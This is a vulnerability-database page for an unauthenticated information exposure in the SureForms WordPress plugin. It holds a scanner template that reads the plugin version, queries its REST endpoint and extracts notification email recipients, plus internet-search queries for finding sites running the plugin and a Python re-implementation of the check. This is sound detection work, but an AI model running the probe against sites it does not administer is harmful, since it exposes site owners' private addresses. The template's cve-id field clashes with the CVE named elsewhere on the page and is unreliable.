SureForms <= 1.13.1 - Sensitive Information Exposure
CVE-2025-12536
Verified
Description
SureForms WordPress plugin <= 1.13.1 contains a sensitive information exposure caused by setting 'auth_callback' to '__return_true' in the '_srfm_email_notification' post meta registration, letting unauthenticated attackers read sensitive email notification data; no authentication is required to exploit it.
Severity
Medium
CVSS Score
5.3
Exploit Probability
1%
Affected Product
sureforms
Published Date
April 6, 2026
Template Author
pussycat0x
CVE-2025-12536.yaml
id: CVE-2025-12536

info:
  name: SureForms <= 1.13.1 - Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    SureForms WordPress plugin <= 1.13.1 contains a sensitive information exposure caused by setting 'auth_callback' to '__return_true' in the '_srfm_email_notification' post meta registration, letting unauthenticated attackers read sensitive email notification data; no authentication is required to exploit it.
  impact: |
    Unauthenticated attackers can access sensitive email notification configurations, potentially leading to data leakage and abuse of downstream systems.
  remediation: |
    Update to the latest version beyond 1.13.1.
  reference:
    - https://patchstack.com/database/wordpress/plugin/sureforms/vulnerability/wordpress-sureforms-plugin-1-13-1-unauthenticated-sensitive-information-exposure-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms/sureforms-1131-missing-authorization-to-unauthenticated-sensitive-information-exposure
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14437
    epss-score: 0.00639
    epss-percentile: 0.70767
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 3
    vendor: brainstormforce
    product: sureforms
    framework: wordpress
    shodan-query: 'http.html:"/wp-content/plugins/sureforms/"'
    fofa-query: body="/wp-content/plugins/sureforms/"
    publicwww-query: "/wp-content/plugins/sureforms/"
  tags: cve,cve2025,wordpress,wp-plugin,sureforms,exposure,wp

flow: http(1) && http(2)

http:
  # Step 1: fingerprint the plugin version from readme.txt (internal, no finding on its own)
  - raw:
      - |
        GET /wp-content/plugins/sureforms/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "SureForms")'
          - compare_versions(version, '<= 1.13.1')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

  # Step 2: check whether the form post type's REST endpoint exposes the notification meta
  - raw:
      - |
        GET /{{route}} HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/sureforms_form"
        - "?rest_route=/wp/v2/sureforms_form"
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: content_type
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - "_srfm_email_notification"
          - "sureforms_form"
        condition: and

      - type: word
        part: body
        words:
          - "email_to"
          - "email_cc"
          - "email_bcc"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: email_to
        part: body
        group: 1
        regex:
          - '"email_to"\s*:\s*"([^"]+)"'

      - type: regex
        name: email_cc
        part: body
        group: 1
        regex:
          - '"email_cc"\s*:\s*"([^"]+)"'

      - type: regex
        name: email_bcc
        part: body
        group: 1
        regex:
          - '"email_bcc"\s*:\s*"([^"]+)"'
# digest: 4a0a0047304502205c502bb4b93fe270ff144e4b6dbad982be32bbe5c6a863c0bd823dfaa0600df0022100d533e057e73cfb4171bc3e71b27ef0de03064377a8afcc0bce506f065c5d41e0:922c64590222798bb761d5b6d8e72950
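For verifying a site you administer after patching, the following is an added Python re-implementation of the template's two-step logic (it is not part of the template or the SureForms project): it reads the readme's Stable tag with a numeric version compare, so 1.13.10 is not mistaken for a vulnerable release, and walks the REST response JSON for recipient fields anywhere under `_srfm_email_notification`, which covers nested meta that a flat regex might miss. The sample readme and response are constructed, and the response layout (a `meta` object holding that key) is an assumption.

```python
import json
import re

MAX_AFFECTED = (1, 13, 1)  # highest affected release named by the advisory
META_KEY = "_srfm_email_notification"
RECIPIENT_KEYS = ("email_to", "email_cc", "email_bcc")
STABLE_TAG_RE = re.compile(r"(?i)Stable.tag:\s?([\w.]+)")  # as in the template's extractor

def parse_version(text):
    # '1.13.1' -> (1, 13, 1); a non-numeric component counts as 0
    return tuple(int(p) if p.isdigit() else 0 for p in text.split("."))

def readme_version(readme_text):
    # version tuple from the readme's 'Stable tag' line, or None if absent
    match = STABLE_TAG_RE.search(readme_text)
    return parse_version(match.group(1)) if match else None

def is_affected_version(version):
    # numeric compare: 1.13.10 is correctly NOT <= 1.13.1 (a string compare would say it is)
    return version is not None and version <= MAX_AFFECTED

def _collect(node, found, inside_meta=False):
    # walk the JSON; record recipient strings only once inside the notification meta
    if isinstance(node, dict):
        for key, value in node.items():
            if inside_meta and key in RECIPIENT_KEYS and isinstance(value, str) and value:
                found.setdefault(key, []).append(value)
            _collect(value, found, inside_meta or key == META_KEY)
    elif isinstance(node, list):
        for item in node:
            _collect(item, found, inside_meta)

def exposed_recipients(rest_body):
    # recipient field -> addresses visible in a /wp/v2/sureforms_form response;
    # an empty dict means the notification meta is no longer readable there
    found = {}
    _collect(json.loads(rest_body), found)
    return found

def check_site(readme_text, rest_body):
    # both legs of the template's flow: affected version AND exposed meta
    return is_affected_version(readme_version(readme_text)) and bool(exposed_recipients(rest_body))

# constructed sample inputs (not captured from any real site); assumed response layout
SAMPLE_README = "=== SureForms ===\nStable tag: 1.13.1\nTested up to: 6.7\n"
SAMPLE_RESPONSE = json.dumps([
    {"id": 7, "type": "sureforms_form", "meta": {META_KEY: [
        {"name": "Admin alert", "email_to": "owner@example.test",
         "email_cc": "", "email_bcc": "backup@example.test"}]}},
    {"id": 9, "type": "sureforms_form", "meta": {}},
])
```

Feed `check_site` the readme.txt and the REST body fetched from your own site; a `False` after updating confirms the meta is no longer served to unauthenticated callers.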